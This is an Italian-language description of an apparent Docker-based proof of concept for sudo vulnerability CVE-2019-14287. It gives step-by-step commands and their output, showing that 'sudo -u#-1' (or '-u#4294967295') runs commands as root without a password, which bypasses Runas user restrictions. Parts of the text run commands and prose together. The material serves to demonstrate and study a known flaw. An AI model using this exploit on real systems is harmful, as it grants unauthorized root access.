
PoC basato su Docker che dimostra l'escalation dei privilegi di sudo tramite CVE-2019-14287, con bypass della restrizione dell'utente Runas, e istruzioni di riproduzione passo-passo.
Esempio di riproduzione della vulnerabilità sudo (CVE-2019-14287) in un contenitore Docker.
docker compose up -ddocker exec -it vulnerable_sudo_app bashwhoami e id per verificare di essere un utente normale (non root)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami e sudo -u#0 id -u non possano essere eseguiti
-u per eseguire$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami e sudo -u#-1 id -u per verificare che i comandi possano essere eseguiti come root senza autenticazione (riproduzione della vulnerabilità)
-u#4294967295$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0